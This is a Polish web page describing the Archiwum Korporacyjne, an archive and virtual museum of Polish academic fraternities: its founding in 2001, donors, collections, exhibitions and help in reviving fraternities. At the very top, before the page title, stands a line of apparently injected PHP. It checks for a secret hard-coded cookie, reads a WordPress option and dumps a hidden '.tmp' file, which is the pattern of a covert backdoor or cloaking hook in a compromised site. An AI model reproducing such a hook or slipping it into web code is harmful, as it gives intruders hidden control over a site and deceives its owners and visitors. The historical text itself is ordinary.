if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Archiwum Korporacyjne

Archiwum Korporacyjne powstało w 2001 r. Celem instytucji jest utrwalanie w pamięci społeczeństwa dorobku i tradycji polskich korporacji akademickich, ze szczególnym uwzględnieniem ich charakteru ideowo-wychowawczego.

Stowarzyszenie Filistrów Poznańskich Korporacji Akademickich, 2000 r.

Archiwum Korporacyjne zajmuje się historią polskich korporacji akademickich z lat 1816-1989 (vide O korporacjach), upowszechnia wiedzę o dziejach i tradycjach korporacyjnych, a także podejmuje działania upamiętniające zmarłych korporantów. Archiwum gromadzi wiadomości, pamiątki i inne materialne ślady związane z dawnymi korporacjami, prowadzi wirtualne Muzeum Polskich Korporacji Akademickich oraz wspiera rozwój współczesnych korporacji.

Pomysł stworzenia tego rodzaju instytucji nie był nowy. Już od lat 70-tych członkowie niektórych przedwojennych korporacji akademickich podejmowali nieoficjalnie podobne inicjatywy (vide Historia).

Księgi pamiątkowe korporacji z lat 1889–1937, 2007 r.

Archiwum Korporacyjne powstało dzięki wsparciu Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich (obecnie Stowarzyszenie Filistrów Korporacji Akademickich) oraz Korporacji Lechia. Jego zaczątkiem były przekazane przez dra Józefa Krzyżaniaka z K! Chrobria oraz Zygfryda Kordusa z K! Magna-Polonia czapki, bandy, odznaki oraz inne pamiątki korporacyjne. Wiosną 2001 r. dzięki wsparciu prezesa Stowarzyszenia dra Bolesława Skrzypczaka rozpoczęła się trwająca do dzisiaj akcja informacyjna dotycząca nowopowstałego Archiwum Korporacyjnego (vide Poszukiwania). W jej wyniku już w pierwszych miesiącach udało się zgromadzić znaczny zbiór pamiątek korporacyjnych. Było to możliwe dzięki pomocy zasłużonych dla odrodzenia ruchu korporacyjnego w Polsce po 1989 r.: prof. Zbysława Popławskiego z lwowskiej K! Slavia oraz Leona Ter-Oganjana z warszawskiej K! Varsovia, a także innych członków seniorów stowarzyszeń filisterskich z Warszawy i Poznania (vide Podziękowania).

Wystawa na Zamku Królewskim w Warszawie, 2008/09 r.

W sumie w latach 2001–2010 dzięki ofiarności żyjących jeszcze przedwojennych członków korporacji, a także rodzin zmarłych już korporantów udało się zgromadzić obszerny zbiór materiałów archiwalnych obejmujący wiadomości biograficzne o wielu tysiącach członków korporacji, około sto oryginalnych czapek, ponad dwieście band, szarf, odznak, kilka tysięcy przedwojennych fotografii, wydawnictw oraz dokumentów dawnych korporacji z Dorpatu, Rygi, Czerniowiec, Wilna, Warszawy, Lwowa, Poznania, Krakowa, Lublina, Cieszyna, Gdańska, Kowna oraz Wiednia. Ponadto w roku akademickim 2006–2007 zarejestrowano wywiady z kilkudziesięcioma przedwojennymi korporantami (vide Ostatni Filistrzy).

Znaczną część zgromadzonych pamiątek, a także ponad półtora tysiąca stron opracowań historycznych poświęconych dziejom korporacji akademickich oraz postaciom ich członków, zaprezentowano w stworzonym w 2007 r. wirtualnym Muzeum Polskich Korporacji Akademickich (vide Muzeum Korporacyjne). Także od 2007 r. zbiory Archiwum były corocznie przedstawiane na wystawach poświęconych dziejom korporacji akademickich, dawnego życia studenckiego oraz historii dwudziestolecia międzywojennego (vide Wystawy).

Członkowie reaktywowanych w ostatnich latach korporacji, 2009 r.

W latach 2001-2010 prowadzone były także inne działania. Zgromadzone w Archiwum zbiory pomogły w reaktywacji kilkunastu korporacji akademickich - Chrobrii, Baltii, Magna-Polonii, Masovii, Z.A.G. Wisła, Hermesii, Surmy, Slavii, Romy, Laudy oraz Arcadii (vide Reaktywacje korporacji). Zbiory Archiwum udostępniane były naukowcom, dziennikarzom, rodzinom przedwojennych korporantów, większości czynnie działających korporacji akademickich (vide Udostępnianie zbiorów). W 2008 r. zainicjowano prace, których celem jest ufundowanie w latach 2008-2014 trzech tablic pamiątkowych poświęconych zasłużonym członkom polskich korporacji akademickich (vide Tablice pamiątkowe).

Pomocą organizacyjno-finansową służy Stowarzyszenie Filistrów Korporacji Akademickich (vide Finansowanie). Działania Archiwum wspierane są także przez Związek Polskich Korporacji Akademickich w Poznaniu.

dr Bartłomiej Wróblewski

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 20 X 2011 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }